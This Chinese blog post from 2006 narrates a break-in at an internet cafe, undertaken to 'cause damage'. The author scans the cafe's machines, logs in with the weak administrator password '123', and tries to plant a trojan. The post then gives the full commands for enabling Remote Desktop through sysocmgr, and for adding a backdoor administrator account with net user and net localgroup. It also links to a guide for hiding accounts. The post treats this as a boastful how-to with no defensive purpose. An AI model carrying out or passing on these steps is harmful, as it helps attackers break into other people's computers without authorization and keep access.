从ipc$到开3389

王朝other·作者佚名  2006-01-09
窄屏简体版  字體: |||超大  

今天到这个网吧上网很不爽 所以想搞一下破坏。先看看有什么东西。用流光扫了一下。晕 什么都没有 只有一个弱口令 user:administrator pass:123。

上去看看 本来准备在命令行下建立一个空连接。但我比较懒。就直接用木马种植者。copy木马上去。提示复制成功。但运行失败。郁闷中......还是telnet 23看看吧

运行cnd

Microsoft Windows XP [版本 5.1.2600]

© 版权所有 1985-2001 Microsoft Corp.

C:\Documents and Settings\JS.NET>cdC:\>telnet 192.168.1.8

正在连接到192.168.1.8...不能打开到主机的连接, 在端口 23: 连接失败

晕 没开telnet 我就郁闷啊

看来没什么戏了。继续浏览我的网页。看着看着。居然在华夏看到一个软件。只要知道知道管理员用户和密码就可以开启3389,23等端口。呵呵 赶紧下下来看看

填写administrator 填写密码123以后 开3389

然后点开始运行----mstsc 打开远程桌面连接。填写ip192.138.1.8

什么?????无法连接。难道没开3389?我就郁闷啊我!!!!!幸好还有个开telnet的 试一下看可以不可以。点击了一下。出来一串e文。提示成功 还祝我good luck。我就晕 telnet看一下了再说

运行cmd 输入telnet 192.168.1.8 添入user:admin pass:123

成功。呵呵 开他的3389看看

c:\>query user

这个工具需要安装终端服务.

没安装,那我们开始给他安装一下

c:\>dir c:\sysoc.inf /s

c:\winnt\inf 的目录

2004-11-11 21:00 3,770 sysoc.inf

1 个文件 3,770 字节

c:\> dir c:\sysocmgr.* /s

c:\winnt\system32 的目录

2000-11-11 21:03 42,768 sysocmgr.exe

1 个文件 42,768 字节

c:\>echo [components] > c:\wawa

c:\>echo tsenable = on >> c:\wawa

c:\>type c:\wawa

[components]

tsenable = on

c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\wawa /q

本来等待一下主机就可以重启了.但我的却先重启了 真是失败.呵呵.等重新启动以后运行__mstsc 192.168.1.8

呵呵 可以进去了,终于完成了.先不忙着破坏。给自己留一个后门,先建立一个用户:txsky pass:txsky。

cmd下的命令是这样的。telnet上对方以后 依次使用下面的命令:

net user txsky txsky/add

//建立用户

net localgroup administrators txsky /add

//提升权限

建立超级应藏的用户吧。参考文章:http://shop.enet.com.cn/eschool/inforcenter/A20040721326501_2.html

呵呵 安全了 撤退了

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
 
 
© 2005- 王朝網路 版權所有 導航